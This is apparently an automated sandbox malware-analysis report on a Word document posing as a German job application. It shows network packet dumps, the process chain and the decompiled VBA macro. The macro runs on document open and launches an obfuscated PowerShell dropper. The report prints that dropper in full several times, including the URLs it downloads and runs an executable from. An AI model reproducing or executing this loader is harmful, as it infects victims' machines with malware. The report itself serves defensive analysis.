Mar 21, 2019 14:01:27.243365049 CET	15	IN	Data Raw: 74 24 10 8a d8 8b 44 24 2c 8b 48 04 8b 01 8b 40 10 ff d0 46 47 3a d8 75 19 8b 44 24 24 3b f5 75 bc 8b 4c 24 18 3b f8 5f 0f 44 ce 5e 5d 8b c1 5b 59 c3 8b 44 24 18 5f 5e 5d 5b 59 c3 cc 8b 4c 24 08 83 ec 38 53 55 8b 6c 24 54 56 8b f1 57 8b 7c 24 58 Data Ascii: t$D$,H@FG:uD$$;uL$;_D^][YD$_^][YL$8SUl$TVW\|$X;L$T0;)T$AL$PRT$D$D$dRT$ RP\|$(T$,L$uD$C8\|$r?B=r,D$A;+#Ql1
Mar 21, 2019 14:01:27.243391037 CET	16	IN	Data Raw: 8d 44 24 1c 50 e8 80 fb ff ff 83 c4 18 8b 00 89 06 8b c6 5e c3 ff 74 24 10 ff 74 24 1c ff 74 24 1c 50 ff 74 24 1c 8d 44 24 1c 50 e8 ca fc ff ff 83 c4 18 8b 00 89 06 8b c6 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 1c 8b 44 24 0c Data Ascii: D$P^t$t$t$Pt$D$P^L$D$Vt$t&t$t$t$Pt$D$P^t&t$t$t$Pt$D$P ^t$t$t$Pt$D$PZ^Ujh[C
Mar 21, 2019 14:01:27.243433952 CET	17	IN	Data Raw: 74 07 1b c0 83 c8 01 eb 02 33 c0 85 c0 75 30 8b 45 e0 3b c3 72 29 77 27 ff 75 10 8b 4d ec e8 04 52 00 00 8b 45 08 89 30 c6 40 04 00 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 5d ec 8b 7d e8 e9 2d ff ff ff c7 45 fc ff ff ff ff 8b Data Ascii: t3u0E;r)w'uMRE0@Md_^[]]}-E}};t!OH1N9VHNOHWCU;Cu9C\|#;u9AA;tCA@AEJEE8@Md_^[]uE
Mar 21, 2019 14:01:27.243475914 CET	18	IN	Data Raw: 6f 08 8b cd e8 2b d2 00 00 33 db 39 5e 68 76 61 33 ff 66 90 8b 4e 24 8b c3 c1 e8 05 8d 14 81 8b cb 83 e1 1f b8 01 00 00 00 d3 e0 85 02 8b 45 00 74 1a c6 44 07 08 01 8b 46 34 8b 4d 00 8b 04 d8 89 04 0f 8b 46 34 8b 44 d8 04 eb 11 c6 44 07 08 00 8b Data Ascii: o+39^hva3fN$EtDF4MF4DDMFPFPMCD;^hr\|$FLMFLG9GGGAG FP9G G$G(FPG,FP]G0[_^L$u2S$ppPAP$
Mar 21, 2019 14:01:27.243500948 CET	20	IN	Data Raw: 00 50 64 89 25 00 00 00 00 51 53 56 57 89 65 f0 c7 45 fc 00 00 00 00 8b 75 10 8b 7d 0c 8b 5d 08 90 85 ff 74 14 53 8b ce e8 04 03 00 00 4f 89 7d 0c 83 c3 08 89 5d 08 eb e8 c7 45 fc ff ff ff ff 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 6a Data Ascii: Pd%QSVWeEu}]tSO}]EMd_^[]jj;Ujh[CdPd%QSVWeEME@ttWfIMEEMd_^[]jj;Ujh[CdPd%QSVWeE
Mar 21, 2019 14:01:27.243525028 CET	21	IN	Data Raw: 8b cf e8 17 be 00 00 8b cf e8 30 ae 00 00 8b c7 5f 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 5c 43 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 1c 53 56 57 89 65 f0 33 f6 89 75 e8 32 db 88 5d ef 8b 7d 08 89 7d d8 8b 07 8b Data Ascii: 0_^[Ujh\CdPd%SVWe3u2]}}@L88tPjToEjMEE@L88EuuE;Eu]@L88vEqMyruEWPj
Mar 21, 2019 14:01:27.303745031 CET	22	IN	Data Raw: 74 2d 8b 74 24 10 8b ce 89 35 60 c7 44 00 8b 16 ff 52 04 56 e8 56 03 01 00 83 c4 04 8d 4c 24 18 e8 bb f9 00 00 5f 8b c6 5e 5d 5b 83 c4 18 c3 0f 57 c0 c7 44 24 1c b4 75 43 00 68 f8 6b 44 00 8d 44 24 20 66 0f d6 44 24 24 50 c7 44 24 28 c8 76 43 00 Data Ascii: t-t$5`DRVVL$_^][WD$uChkDD$ fD$$PD$(vC!2SUVWjL$=hDD\$u1WL$9=hDuHD@HDhDL$4=hDl$,M;ysA4ud3yt;xs@4uFtL$

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2296 Parent PID: 532

General

Start time:	14:00:47
Start date:	21/03/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2f420000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2876 Parent PID: 2296

General

Start time:	14:00:59
Start date:	21/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Imagebase:	0x4a220000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 1716 Parent PID: 2876

General

Start time:	14:01:00
Start date:	21/03/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Imagebase:	0x21e00000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: 229.exe PID: 2932 Parent PID: 1716

General

Start time:	14:01:10
Start date:	21/03/2019
Path:	C:\Windows\Temp\229.exe
Wow64 process (32bit):	false
Commandline:	'C:\windows\temp\229.exe'
Imagebase:	0x400000
File size:	548352 bytes
MD5 hash:	A76B7140CF6D5C4DC5E0ECFF23FC2CE0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: IvHpl

Declaration

Line	Content
1	Attribute VB_Name = "IvHpl"

Executed Functions

Function pcbBtz, APIs: 2, Strings: 0, Number of lines: 7, Relevance: 7.507

APIs

Meta Information

Shell

Shell("c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);",0) -> 2876

StrReverse

StrReverse(";)D5y43WFj$(xei;'' = pcHwi$;)fHEYP$ ,'000'(ecalper.'}}{hctac};kaerb;1mtAHdKsG$ ssec000orp-tr000ats;)1mtAHdKsG$ ,)(gnirt000SoT.VL4YJ$(eli000fda000oln000wod.Lk9VCk${yrt{)JBVHLiNei$ ni VL4YJ$(hcae000rof;"\e000xe.922\p000met\swod000niw\:c"\ = 1mtAHdKsG$;)63556 ,1(t000xen.Gkf1uNYRD$ = IWiH3E$;)"\,"\(ti000lps."\exe.drow/1hcraeSxaja/sj/hcraeSxaja/steppins/stessa/ur.gniddew-omsoc//:000p000t000t000h000,exe.drow/ur.ogtdns//:000p000t000t000h000,exe.drow/rf/nocixel/yrellag/stnenopmoc/eroc/ur.ksmewej//:s000p000t000t000h000,exe.drow/sroloc/stegdiw/reganamreganam/snigulp/stessa/ur.aklabyr-rotsorp//:000p000t000t000h000,exe.drow/sbatedih_mm/stegdiw/reganamreganam/snigulp/stessa/ur.lytsrats//:s000p000t000t000h000"\ = JBVHLiNei$;modnar tcejbo-wen = Gkf1uNYRD$;tneilc000bew.ten.met000sys tcejbo-wen = Lk9VCk$;ll000ehs.tpir000csw tce000jbo000moc- tce000jbo-wen = Ht8px$' = D5y43WFj$ %s%%p% llac &&llehs=s tes &&rewop=p tes c/ dmc\\23metsys\\swodniw\\:c") -> c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);

Line	Instruction	Meta Information
6	Function pcbBtz(sYNoxQh, EzDka) as String
7	Dim UPQ2DvJWM as Boolean	executed
8	UPQ2DvJWM = False
9	Dim WLqv4a6J as Single
10	WLqv4a6J = 23197.750737484
11	pcbBtz = Shell(StrReverse(sYNoxQh), 0)	Shell("c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);",0) -> 2876 StrReverse(";)D5y43WFj$(xei;'' = pcHwi$;)fHEYP$ ,'000'(ecalper.'}}{hctac};kaerb;1mtAHdKsG$ ssec000orp-tr000ats;)1mtAHdKsG$ ,)(gnirt000SoT.VL4YJ$(eli000fda000oln000wod.Lk9VCk${yrt{)JBVHLiNei$ ni VL4YJ$(hcae000rof;"\e000xe.922\p000met\swod000niw\:c"\ = 1mtAHdKsG$;)63556 ,1(t000xen.Gkf1uNYRD$ = IWiH3E$;)"\,"\(ti000lps."\exe.drow/1hcraeSxaja/sj/hcraeSxaja/steppins/stessa/ur.gniddew-omsoc//:000p000t000t000h000,exe.drow/ur.ogtdns//:000p000t000t000h000,exe.drow/rf/nocixel/yrellag/stnenopmoc/eroc/ur.ksmewej//:s000p000t000t000h000,exe.drow/sroloc/stegdiw/reganamreganam/snigulp/stessa/ur.aklabyr-rotsorp//:000p000t000t000h000,exe.drow/sbatedih_mm/stegdiw/reganamreganam/snigulp/stessa/ur.lytsrats//:s000p000t000t000h000"\ = JBVHLiNei$;modnar tcejbo-wen = Gkf1uNYRD$;tneilc000bew.ten.met000sys tcejbo-wen = Lk9VCk$;ll000ehs.tpir000csw tce000jbo000moc- tce000jbo-wen = Ht8px$' = D5y43WFj$ %s%%p% llac &&llehs=s tes &&rewop=p tes c/ dmc\\23metsys\\swodniw\\:c") -> c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D); executed
12	End Function

Non-Executed Functions

Subroutine xDQze, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub xDQze()
3	End Sub

Subroutine V7LCHEVbx, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
4	Sub V7LCHEVbx()
5	End Sub

Module: NexFaBP

Declaration

Line	Content
1	Attribute VB_Name = "NexFaBP"

Executed Functions

Subroutine i9900k, APIs: 2, Strings: 0, Number of lines: 13, Relevance: 2.513

APIs	Meta Information
Sgn
zGZ20tm8$

Line	Instruction	Meta Information
6	Public Sub i9900k()
7	Dim piy0w as Long	executed
8	piy0w = 0
9	Dim s4dUncq2 as Boolean
10	s4dUncq2 = False
11	Dim AWpR8M as Boolean
12	AWpR8M = True
13	Dim cDoNYM as Long
14	cDoNYM = Sgn(- 1578441454)	Sgn
15	Dim DAHsW4wge as Long
16	DAHsW4wge = - 335364396
17	zGZ20tm8$	zGZ20tm8$
18	End Sub

Non-Executed Functions

Subroutine zgedb5uE, APIs: 1, Strings: 0, Number of lines: 4, Relevance: 1.254

APIs	Meta Information
Fix

Line	Instruction	Meta Information
2	Sub zgedb5uE()
3	Dim Md53kf8 as Single
4	Md53kf8 = Fix(63298.888186878)	Fix
5	End Sub

Module: RCUzh

Declaration

Line	Content
1	Attribute VB_Name = "RCUzh"

Executed Functions

Function zGZ20tm8, APIs: 7, Strings: 1, Number of lines: 20, Relevance: 15.77

APIs	Meta Information
Sgn
Len	Len() -> 0
jhaGfR
monday
Sgn
Part of subcall function pcbBtz@IvHpl: Shell
Part of subcall function pcbBtz@IvHpl: StrReverse

Strings	Decrypted Strings
"&"

Line	Instruction	Meta Information
4	Public Function zGZ20tm8() as String
5	Dim PvWP6	executed
6	PvWP6 = "&"
7	Dim Mb0KC as Single
8	Mb0KC = Sgn(51873.055630678)	Sgn
9	Dim nuZzfEa8j as Object
10	Set nuZzfEa8j = New fm
11	Dim Vih9Ldw as Byte
12	Vih9Ldw = 63
13	Dim RDbFnvZl7 as String
14	Dim PnHE18cfu as String
15	PnHE18cfu = Len(jhaGfR)	Len() -> 0 jhaGfR executed
16	RDbFnvZl7 = nuZzfEa8j.monday.Text	monday
17	Dim oqEHOy2 as Long
18	oqEHOy2 = - 1101752412
19	Dim DxTqzWD as Double
20	DxTqzWD = Sgn(39646.160630077)	Sgn
21	RDbFnvZl7 = pcbBtz(RDbFnvZl7, 28928 / 113)
22	zGZ20tm8 = RDbFnvZl7
23	End Function

Non-Executed Functions

Subroutine PtNBJO8Yp, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub PtNBJO8Yp()
3	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_Open, APIs: 2, Strings: 0, Number of lines: 9, Relevance: 4.509

APIs	Meta Information
Part of subcall function i9900k@NexFaBP: Sgn
Part of subcall function i9900k@NexFaBP: zGZ20tm8$

Line	Instruction	Meta Information
10	Sub Document_Open()
13	Dim RgeJIsB as Byte	executed
14	RgeJIsB = 126
15	Dim q4H2mwp56 as Boolean
16	q4H2mwp56 = False
18	Dim v7bBxp as Byte
19	v7bBxp = 148
20	i9900k
21	End Sub

Module: fm

Declaration

Line	Content
1	Attribute VB_Name = "fm"
2	Attribute VB_Base = "0{38DFB29E-5608-4364-9A9B-0D444F94F45E}{023AECA8-FFDA-47EE-8FAE-2CF97F0B7C44}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Sarah_Siedler_Bewerbungsunterlagen.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "word/vbaProject.bin"

Indicators

Streams with VBA

VBA File Name: IvHpl.bas, Stream Size: 1418

General

VBA Code Keywords

VBA Code

VBA File Name: NexFaBP.bas, Stream Size: 1565

General